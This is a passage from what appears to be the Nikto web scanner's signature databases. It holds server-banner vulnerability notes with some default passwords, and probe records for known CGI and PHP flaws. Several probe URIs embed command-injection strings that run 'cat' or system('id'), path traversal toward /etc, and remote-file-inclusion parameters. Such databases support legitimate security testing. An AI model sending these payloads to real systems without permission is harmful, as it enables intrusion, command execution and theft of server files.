problems.\"\n\"800226\",\"Weblogic\\/6\\.1\",\"https://securitytracker.com/id/1004182\",\"WebLogic 6.1 SP2 for Win2k may have multiple problems.\"\n\"800227\",\"webquest\",\"\",\"http://www.questar.com/\"\n\"800228\",\"webshare\",\"https://web.archive.org/web/19990116231623/http://www.beyond-software.com/products/eweb/webshare/webshare.html\",\"Webshare server is no long supported.\"\n\"800229\",\"websitepro\",\"\",\"http://website.ora.com/\"\n\"800230\",\"WebSitePro\\/2\\.[0-4]\",\"CVE-2000-0623\",\"Versions of WebSitePro lower than 2.5 have multiple buffer overflows. Upgrade to 2.5 or higher.\"\n\"800231\",\"WebSitePro\\/3\\.1\\.11\\.0\",\"\",\"WebSitePro 3.1.11.0 can disclose source code by requesting the 8.3 file name instead of the full file name.\"\n\"800232\",\"Websphere\\/4\\.0\\.3\",\"CVE-2002-1153\",\"This server may have a DoS if large HTTP headers are received. Install patch PQ62144.\"\n\"800233\",\"webstar\",\"\",\"http://www.starnine.com/webstar may let you download log files\"\n\"800234\",\"WebZerver\",\"\",\"May be DiscZerver\"\n\"800235\",\"whostmgr\",\"\",\"This is a web host and system manager. It should not be running unless required, as it allows system/server administration.\"\n\"800236\",\"wildcat\",\"\",\"http://www.santronics.com/\"\n\"800237\",\"Worldgroup\\/3\\.20\",\"\",\"WoldGroup 3.20 is vulnerable to a remote root exploit, it should be upgraded.\"\n\"800238\",\"Xedia\",\"https://github.com/sullo/advisory-archives/blob/master/phenoelit.Lucent_Xedia.txt\",\"Lucent access points may be vulnerable to a DoS if 4000 characters are requested.\"\n\"800239\",\"Xeneo\\/(2\\.\\1\\.[0-9]|[0-1]\\..*)\",\"CVE-2002-1248\",\"May be able to DoS the server by requesting '%A'.\"\n\"800240\",\"Xeneo\\/(2\\.\\1\\.0\\.0|2\\.0\\.759\\.6)\",\"https://seclists.org/fulldisclosure/2002/Nov/10\",\"May be able to DoS the server by requesting '%'.\"\n\"800241\",\"xerox\",\"\",\"Probably a printer.\"\n\"800242\",\"xitami\",\"\",\"Open Source Windows server may be vulnerable to a buffer overflow. Check for the latest version from Xitami.com.\"\n\"800243\",\"xitami\\/(2.[0-4]*|1\\.*)\",\"\",\"This version of Xitami from http://www.imatix.com/html/xitami/ may disclose script source if any error occurs. Upgrade to a newer version.\"\n\"800244\",\"zbserver\\/\",\"\",\"May be vulnerale to a DoS (version Pro 1.50-r13).\"\n\"800245\",\"zeus\",\"https://github.com/sullo/advisory-archives/blob/master/RFP9905.txt\",\"Multiple vulnerabilities are found in old Zeus servers\"\n\"800246\",\"Zeus\\/3\\.[123]\",\"CVE-2000-0149\",\"Bug allows source of CGI to be viewed. Upgrade to 3.3.5a or higher\"\n\"800249\",\"Zope\\/((0|1).*|2\\.((0\\..*)|(1\\..*)|(2\\..*)|(3\\.[0-2])))\",\"\",\"Zope servers below 2.3.3 contain multiple remote configuration problems and vulnerabilities. Upgrade to the latest version.\"\n\"800250\",\"ZyXEL-RomPager\",\"\",\"Probably a Netgear SoHo Router (RT-314 or similar), most likely vulnerable to CSS.\"\n\"800251\",\"Netscape-Enterprise\\/4.\",\"\",\"Netscape-Enterprise 4.x was made End of Life by Sun Microsystems in December  2002.\"\n\"800252\",\"CERN\\/3\",\"\",\"CERN 3.0A has not been updated since July, 1996 and likely has a few flaws.\"\n\"800253\",\"Agent-ListenServer-HttpSvr\\/1\\.0\",\"\",\"McAfee ePolicy Orchestra Agent. This may reveal information about anti-virus and software update schedules.\"\n\"800254\",\"HP System Management Homepage\\/([0-2]|3\\.0\\.(0|1\\.([0-6]|7[0-2])))\",\"https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c04463322\",\"HP System Management Homepage version contains multiple vulnerabilities.\"\n\"800255\",\"cp-sw-server\",\"\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800256\",\"cpservd\",\"\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800257\",\"mod_speling\",\"\",\"mod_speling can reveal otherwise hidden files via 'misspelled' file names.\"\n\"800260\",\"Jetty\\(9\\.2\\.[3-8].*\",\"CVE-2015-2080\",\"Jetty 9.2.3 to 9.2.8 contains a flaw that is triggered when handling 400 errors in HTTP responses. This may allow a remote attacker to gain access to potentially sensitive information in the memory.\"\n\"800261\",\"PAW Server\",\"\",\"PAW Server default admin id/password is admin/paw. It's worth a try.\"\n\"800262\",\"PHP\\/([345]\\.\\d|7\\.0)\",\"\",\"PHP 3/4/5 and 7.0 are End of Life products without support.\"\n\"800263\",\"PHP\\/7\\.1\",\"\",\"PHP 7.1 is End of Life and only receives security updates. It will be unsupported after 2019-12-01.\"\n\"800264\",\"Cloudflare\",\"https://github.com/sullo/nikto/wiki/Using-a-Proxy\",\"Cloudflare detected via banner. Recommend proxying via Burp or mitmproxy to avoid TLS fingerprint blocks if not already proxying.\"\n\"800265\",\"railway-edge\",\"https://railway.com/\",\"Application server running on Railway.com cloud platform.\""
  },
  {
    "path": "program/databases/db_tests",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Tuning options (field 3):\n# 0 - File Upload\n# 1 - Interesting File / Seen in logs\n# 2 - Misconfiguration / Default File\n# 3 - Information Disclosure\n# 4 - Injection (XSS/Script/HTML)\n# 5 - Remote File Retrieval - Inside Web Root\n# 6 - Denial of Service\n# 7 - Remote File Retrieval - Server Wide\n# 8 - Command Execution / Remote Shell\n# 9 - SQL Injection\n# a - Authentication Bypass\n# b - Software Identification\n# c - Remote source inclusion\n# d - WebService\n# e - Administrative Console\n# f - XML Injection\n\n# DSL (Domain Specific Language) syntax for matcher:\n# - CODE:pattern     - Match HTTP status code (e.g., CODE:200, CODE:404|500)\n# - BODY:pattern     - Match response body content (e.g., BODY:error, BODY:(?i)php)\n# - HEADER:name:val   - Match response header (e.g., HEADER:server:apache, HEADER:content-type:)\n# - COOKIE:name:val   - Match response cookie (e.g., COOKIE:sessionid:abc123, COOKIE:auth:)\n# - !                - Negation (e.g., !CODE:404, !BODY:error, !COOKIE:sessionid:)\n# - &&               - AND logic between conditions\n# - |                - OR logic within patterns (regex)\n# - (?i)             - Case-insensitive regex flag\n# Examples:\n# - \"CODE:200&&BODY:admin\"                  - 200 status AND \"admin\" in body\n# - \"!CODE:404&&BODY:error\"                 - NOT 404 AND \"error\" in body  \n# - \"CODE:200|500&&HEADER:server:apache\"    - 200 or 500 status AND Apache server header\n# - \"BODY:(?i)php&&!BODY:error\"             - Case-insensitive \"php\" in body AND no \"error\"\n# - \"CODE:200&&COOKIE:sessionid:.*\"          - 200 status AND sessionid cookie matches pattern\n\n# Format: \"ID\",\"References\",\"Tuning\",\"URI\",\"Method\",\"DSL\",\"Message\",\"Data\",\"Headers\"\n#######################################################################\n\"000001\",\"\",\"b\",\"/TiVoConnect?Command=QueryServer\",\"GET\",\"BODY:Calypso Server\",\"The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.\",\"\",\"\"\n\"000002\",\"\",\"b\",\"/TiVoConnect?Command=QueryConta001476iner&Container=/&Recurse=Yes\",\"GET\",\"BODY:TiVoContainer\",\"TiVo client service is running and may allow download of mp3 or jpg files.\",\"\",\"\"\n\"000003\",\"\",\"1234576890ab\",\"@CGIDIRScart32.exe\",\"GET\",\"CODE:200\",\"request cart32.exe/cart32clientlist\",\"\",\"\"\n\"000004\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSclassified.cgi\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000005\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSdownload.cgi\",\"GET\",\"CODE:200\",\"Check info in Phrack 55 by RFP\",\"\",\"\"\n\"000006\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSflexform.cgi\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP; allows to append info to writable files.\",\"\",\"\"\n\"000007\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSflexform\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP; allows to append info to writable files.\",\"\",\"\"\n\"000008\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSlwgate.cgi\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000009\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSLWGate.cgi\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP.\",\"\",\"\"\n\"000010\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSlwgate\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000011\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSLWGate\",\"GET\",\"CODE:200\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000012\",\"http://phrack.org/issues/55/7.html#article\",\"1234576890ab\",\"@CGIDIRSperlshop.cgi\",\"GET\",\"CODE:200\",\"v3.1 by ARPAnet.com; check info in Phrack 55 by RFP\",\"\",\"\"\n\"000013\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"1234576890ab\",\"/cfappman/index.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"sSsceptible to ODBC/pipe-style exploit.\",\"\",\"\"\n\"000014\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"1234576890ab\",\"/cfdocs/examples/cvbeans/beaninfo.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"Susceptible to ODBC exploit.\",\"\",\"\"\n\"000015\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"1234576890ab\",\"/cfdocs/examples/parks/detail.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"Susceptible to ODBC exploit.\",\"\",\"\"\n\"000016\",\"\",\"1234576890ab\",\"/kboard/\",\"GET\",\"CODE:200\",\"KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php\",\"\",\"\"\n\"000017\",\"\",\"1234576890ab\",\"/lists/admin/\",\"GET\",\"CODE:200\",\"PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist\",\"\",\"\"\n\"000018\",\"https://seclists.org/bugtraq/2002/Jul/262\",\"7a\",\"/splashAdmin.php\",\"GET\",\"CODE:200\",\"Cobalt Qube 3 admin is running. This may have multiple security problems which could not be tested remotely.\",\"\",\"\"\n\"000019\",\"\",\"1234576890ab\",\"/ssdefs/\",\"GET\",\"CODE:200\",\"Siteseed pre 1.4.2 has 'major' security problems.\",\"\",\"\"\n\"000020\",\"\",\"1234576890ab\",\"/sshome/\",\"GET\",\"CODE:200\",\"Siteseed pre 1.4.2 has 'major' security problems.\",\"\",\"\"\n\"000021\",\"\",\"1234576890ab\",\"/tiki/\",\"GET\",\"CODE:200\",\"Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin\",\"\",\"\"\n\"000022\",\"\",\"1234576890ab\",\"/tiki/tiki-install.php\",\"GET\",\"CODE:200\",\"Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin\",\"\",\"\"\n\"000023\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"1234576890ab\",\"/scripts/samples/details.idc\",\"GET\",\"CODE:200\",\"NT ODBC Remote Compromise.\",\"\",\"\"\n\"000024\",\"CVE-2000-0709\",\"6\",\"/_vti_bin/shtml.exe\",\"GET\",\"CODE:200\",\"Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.\",\"\",\"\"\n\"000025\",\"\",\"1\",\"@CGIDIRShandler.cgi\",\"GET\",\"CODE:200\",\"Variation of Irix Handler? Has been seen from other CGI scanners.\",\"\",\"\"\n\"000026\",\"\",\"28\",\"@CGIDIRSfinger\",\"GET\",\"CODE:200\",\"finger other users, may be other commands?\",\"\",\"\"\n\"000027\",\"\",\"28\",\"@CGIDIRSfinger.pl\",\"GET\",\"CODE:200\",\"finger other users, may be other commands?\",\"\",\"\"\n\"000028\",\"\",\"3\",\"@CGIDIRSformmail.cgi\",\"GET\",\"BODY:Matt\\sWright\",\"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.\",\"\",\"\"\n\"000030\",\"\",\"3\",\"@CGIDIRSformmail\",\"GET\",\"BODY:Matt\\sWright\",\"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.\",\"\",\"\"\n\"000031\",\"\",\"3\",\"@CGIDIRSget32.exe\",\"GET\",\"CODE:200\",\"This can allow attackers to execute arbitrary commands remotely.\",\"\",\"\"\n\"000032\",\"CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html\",\"3\",\"@CGIDIRSgm-authors.cgi\",\"GET\",\"CODE:200\",\"GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default.\",\"\",\"\"\n\"000033\",\"\",\"3\",\"@CGIDIRSguestbook/passwd\",\"GET\",\"CODE:200\",\"GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.\",\"\",\"\"\n\"000034\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"@CGIDIRShorde/test.php?mode=phpinfo\",\"GET\",\"BODY:PHP Version\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000035\",\"\",\"3\",\"@CGIDIRSphoto/protected/manage.cgi\",\"GET\",\"CODE:200\",\"My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.\",\"\",\"\"\n\"000036\",\"\",\"3\",\"@CGIDIRSwrap.cgi\",\"GET\",\"CODE:200\",\"Allows viewing of directories.\",\"\",\"\"\n\"000037\",\"\",\"3\",\"/./\",\"GET\",\"BODY:include\\(\\\"\",\"Appending '/./' to a directory may reveal PHP source code.\",\"\",\"\"\n\"000038\",\"CVE-2001-1013\",\"23\",\"/~root/\",\"GET\",\"CODE:200&&!BODY:rtsptext\",\"Allowed to browse root's home directory.\",\"\",\"\"\n\"000039\",\"\",\"3\",\"/cgi-bin/wrap\",\"GET\",\"CODE:200\",\"Allows viewing of directories.\",\"\",\"\"\n\"000040\",\"\",\"3\",\"/forums/@ADMINconfig.php\",\"GET\",\"CODE:200\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000041\",\"\",\"3\",\"/forums/config.php\",\"GET\",\"CODE:200\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000042\",\"\",\"3\",\"/ganglia/\",\"GET\",\"BODY:Cluster\",\"Ganglia Cluster reports reveal detailed information.\",\"\",\"\"\n\"000043\",\"\",\"3\",\"/guestbook/guestbookdat\",\"GET\",\"CODE:200\",\"PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.\",\"\",\"\"\n\"000044\",\"\",\"3\",\"/guestbook/pwd\",\"GET\",\"CODE:200\",\"PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.\",\"\",\"\"\n\"000045\",\"\",\"3\",\"/help/\",\"GET\",\"CODE:200\",\"Help directory should not be accessible\",\"\",\"\"\n\"000046\",\"https://vulners.com/exploitdb/EDB-ID:23027\",\"3\",\"/hola/admin/cms/htmltags.php?datei=./sec/data.php\",\"GET\",\"CODE:200\",\"hola-cms-1.2.9-10 may reveal the administrator ID and password.\",\"\",\"\"\n\"000047\",\"\",\"3\",\"/horde/imp/test.php\",\"GET\",\"BODY:Horde Versions\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000048\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"/horde/test.php?mode=phpinfo\",\"GET\",\"BODY:PHP Version\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000049\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"/imp/horde/test.php?mode=phpinfo\",\"GET\",\"BODY:PHP Version\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000050\",\"\",\"3\",\"/imp/horde/test.php\",\"GET\",\"BODY:Horde Versions\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000051\",\"\",\"3\",\"/index.html.bak\",\"GET\",\"BODY:(?i)index of \\/&&BODY:(?i)directory listing (?:of|for)\",\"The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.\",\"\",\"\"\n\"000052\",\"\",\"3\",\"/index.html~\",\"GET\",\"BODY:(?i)index of \\/&&BODY:(?i)directory listing (?:of|for)\",\"The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.\",\"\",\"\"\n\"000053\",\"CVE-2001-1168\",\"7\",\"/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc\",\"GET\",\"BODY:resolv\\.conf\",\"phpMyExplorer allows attackers to read directories on the server.\",\"\",\"\"\n\"000054\",\"CVE-2002-0614\",\"23\",\"/global.inc\",\"GET\",\"CODE:200\",\"PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php\",\"\",\"\"\n\"000055\",\"\",\"3b\",\"@CGIDIRSformmail.pl\",\"GET\",\"BODY:Matt\\sWright\",\"Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.\",\"\",\"\"\n\"000056\",\"\",\"3b\",\"@CGIDIRShorde/test.php\",\"GET\",\"BODY:Horde Versions\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000057\",\"CVE-2003-1253\",\"4\",\"/inc/common.load.php\",\"GET\",\"CODE:200\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000058\",\"CVE-2003-1253\",\"4\",\"/inc/config.php\",\"GET\",\"CODE:200\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000059\",\"CVE-2003-1253\",\"4\",\"/inc/dbase.php\",\"GET\",\"CODE:200\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000060\",\"\",\"6\",\"@CGIDIRSvisadmin.exe\",\"GET\",\"CODE:200\",\"This CGI allows an attacker to crash the web server. Remove it from the CGI directory.\",\"\",\"\"\n\"000061\",\"\",\"7\",\"@CGIDIRShtml2chtml.cgi\",\"GET\",\"CODE:200\",\"Html2Wml < 0.4.8 access local files via CGI, and more\",\"\",\"\"\n\"000062\",\"\",\"7\",\"@CGIDIRShtml2wml.cgi\",\"GET\",\"CODE:200\",\"Html2Wml < 0.4.8 access local files via CGI, and more\",\"\",\"\"\n\"000063\",\"CVE-2000-0590\",\"7\",\"@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\hosts%00\",\"GET\",\"@LFI()\",\"Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.\",\"\",\"\"\n\"000064\",\"\",\"8\",\"@CGIDIRSecho.bat?&dir+c:\\\\\",\"GET\",\"CODE:200\",\"This batch file may allow attackers to execute remote commands.\",\"\",\"\"\n\"000065\",\"\",\"8\",\"@CGIDIRSexcite;IFS=\\\"$\\\";/bin/cat%20@LFI(nix,abs)\",\"GET\",\"CODE:200&&@LFI()\",\"Excite software is vulnerable to command execution.\",\"\",\"\"\n\"000066\",\"CVE-2000-0187\",\"8\",\"@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20@LFI(abs,nix)|\",\"GET\",\"@LFI()\",\"EZShopper loadpage CGI command execution\",\"\",\"\"\n\"000067\",\"\",\"8\",\"@CGIDIRSguestbook.cgi\",\"GET\",\"CODE:200\",\"May allow attackers to execute commands as the web daemon.\",\"\",\"\"\n\"000068\",\"\",\"8\",\"@CGIDIRSguestbook.pl\",\"GET\",\"CODE:200\",\"May allow attackers to execute commands as the web daemon.\",\"\",\"\"\n\"000069\",\"\",\"8\",\"@CGIDIRSss\",\"GET\",\"CODE:200\",\"Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.\",\"\",\"\"\n\"000070\",\"CVE-2005-0429\",\"8\",\"/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"\",\"GET\",\"BODY:uid=0\",\"VBulletin forumdisplay.php remote command execution.\",\"\",\"\"\n\"000071\",\"https://vulners.com/osvdb/OSVDB:2889\",\"8\",\"/guestbook/guestbook.html\",\"GET\",\"BODY:Jason Maloney\",\"Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01\",\"\",\"\"\n\"000072\",\"\",\"8\",\"/html/cgi-bin/cgicso?query=AAA\",\"GET\",\"BODY:400 Required field missing: fingerhost\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000073\",\"https://vulners.com/osvdb/OSVDB:2703\",\"9\",\"/geeklog/users.php\",\"GET\",\"CODE:200\",\"Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.\",\"\",\"\"\n\"000074\",\"CVE-2002-1560\",\"a\",\"/gb/index.php?login=true\",\"GET\",\"CODE:200\",\"gBook may allow admin login by setting the value 'login' equal to 'true'.\",\"\",\"\"\n\"000075\",\"\",\"a\",\"/guestbook/admin.php\",\"GET\",\"CODE:200\",\"Guestbook admin page available without authentication.\",\"\",\"\"\n\"000076\",\"\",\"b\",\"@CGIDIRSgH.cgi\",\"GET\",\"CODE:200\",\"Web backdoor by gH\",\"\",\"\"\n\"000077\",\"CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html\",\"b\",\"@CGIDIRSgm-cplog.cgi\",\"GET\",\"CODE:200\",\"GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site.\",\"\",\"\"\n\"000078\",\"\",\"b\",\"/getaccess\",\"GET\",\"CODE:200\",\"This may be an indication that the server is running getAccess for SSO\",\"\",\"\"\n\"000079\",\"https://www.darknet.org.uk/2007/01/spike-proxy-application-level-security-assessment/\",\"b\",\"/help.html\",\"GET\",\"BODY:little interface into SPIKE\",\"SPIKE Proxy may be running; try using it as a proxy.\",\"\",\"\"\n\"000080\",\"CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html\",\"3b\",\"@CGIDIRSgm.cgi\",\"GET\",\"CODE:200\",\"GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location.\",\"\",\"\"\n\"000081\",\"CVE-2002-0451\",\"c\",\"/filemanager/filemanager_forms.php?lib_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Some versions of PHProjekt allow remote file inclusions.\",\"\",\"\"\n\"000082\",\"\",\"1e\",\"@CGIDIRSAT-admin.cgi\",\"GET\",\"CODE:200\",\"Admin interface.\",\"\",\"\"\n\"000083\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"@CGIDIRSauth_data/auth_user_file.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000084\",\"\",\"23\",\"@CGIDIRSawstats.pl\",\"GET\",\"BODY:Traffic\",\"AWStats logfile analyzer.\",\"\",\"\"\n\"000085\",\"\",\"23\",\"@CGIDIRSawstats/awstats.pl\",\"GET\",\"BODY:Traffic\",\"Free realtime logfile analyzer for advanced web statistics. Should be protected.\",\"\",\"\"\n\"000086\",\"\",\"23b\",\"@CGIDIRSblog/mt.cfg\",\"GET\",\"BODY:configuration file\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000087\",\"CVE-2003-1517\",\"3\",\"@CGIDIRScart.pl?db='\",\"GET\",\"BODY:c:\\\\\\\\\",\"Dansie Shopping Cart reveals the full path to the CGI directory.\",\"\",\"\"\n\"000088\",\"CVE-2003-1517\",\"3\",\"@CGIDIRScart.pl?db='\",\"GET\",\"BODY:d:\\\\\\\\\",\"Dansie Shopping Cart reveals the full path to the CGI directory.\",\"\",\"\"\n\"000089\",\"CVE-2000-1191\",\"3\",\"@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=\",\"GET\",\"BODY:ht:\\\\\\/\\\\\\/Dig\",\"The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.\",\"\",\"\"\n\"000090\",\"\",\"3\",\"@CGIDIRSmt-static/mt-check.cgi\",\"GET\",\"CODE:200\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"000091\",\"\",\"3\",\"@CGIDIRSmt/mt-check.cgi\",\"GET\",\"CODE:200\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"000092\",\"\",\"3\",\"/cfdocs/expeval/openfile.cfm\",\"GET\",\"CODE:200\",\"Can use to expose the system/server path.\",\"\",\"\"\n\"000093\",\"\",\"3\",\"/index.php/123\",\"GET\",\"BODY:Premature end of script headers\",\"Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.\",\"\",\"\"\n\"000094\",\"https://vulners.com/osvdb/OSVDB:7510\",\"3\",\"/mambo/index.php?Itemid=@JUNK(5)\",\"GET\",\"BODY:exceeded in \\/\",\"Mambo Site Server 4.0.11 reveals the web server path.\",\"\",\"\"\n\"000095\",\"CVE-2002-1723\",\"3\",\"/profile.php?u=@JUNK(8)\",\"GET\",\"BODY:Warning:\",\"Powerboards is vulnerable to path disclosure.\",\"\",\"\"\n\"000096\",\"CVE-2002-2158\",\"3\",\"/ticket.php?id=99999\",\"GET\",\"BODY:expects first argument\",\"ZenTrack versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.\",\"\",\"\"\n\"000097\",\"CVE-2003-0400\",\"3\",\"/vgn/login/1,501,,00.html?cookieName=x--\\>\",\"GET\",\"BODY:value=\\\"x\\-\\-\",\"Vignette server may leak memory with an invalid request. Upgrade to the latest version.\",\"\",\"\"\n\"000098\",\"\",\"3\",\"/a%5c.aspx\",\"GET\",\"BODY:Invalid file name for monitoring:\",\"Older Microsoft .NET installations allow full path disclosure.\",\"\",\"\"\n\"000099\",\"\",\"7\",\"@CGIDIRSbanner.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000100\",\"\",\"7\",\"@CGIDIRSbannereditor.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000101\",\"CVE-2001-1114\",\"7\",\"@CGIDIRSbook.cgi?action=default&current=|cat%20@LFI(nix,abs)|&form_tid=996604045&prev=main.html&list_message_index=10\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000102\",\"\",\"7e\",\"/admin/browse.asp?FilePath=c:\\&Opt=2&level=0\",\"GET\",\"BODY:winnt\",\"Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.\",\"\",\"\"\n\"000103\",\"\",\"8\",\"@CGIDIRSarchitext_query.pl\",\"GET\",\"CODE:200\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000104\",\"CVE-2000-0287\",\"8\",\"@CGIDIRSbizdb1-search.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute commands remotely.\",\"\",\"\"\n\"000105\",\"\",\"b\",\"@CGIDIRSblog/\",\"GET\",\"CODE:200\",\"A blog was found. May contain security problems in CGIs, weak passwords, and more.\",\"\",\"\"\n\"000106\",\"https://web.archive.org/web/20040910030506/http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html\",\"b\",\"/tsweb/\",\"GET\",\"CODE:200\",\"Microsoft TSAC found.\",\"\",\"\"\n\"000107\",\"\",\"1b\",\"@CGIDIRSblog/mt-load.cgi\",\"GET\",\"CODE:200\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000108\",\"CVE-2002-1435\",\"c\",\"@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Achievo can be made to include PHP files from another domain. Upgrade to a new version.\",\"\",\"\"\n\"000109\",\"\",\"23e\",\"/vgn/performance/TMT\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000110\",\"\",\"23e\",\"/vgn/performance/TMT/Report\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000111\",\"\",\"23e\",\"/vgn/performance/TMT/Report/XML\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000112\",\"\",\"23e\",\"/vgn/performance/TMT/reset\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000113\",\"\",\"23e\",\"/vgn/ppstats\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script 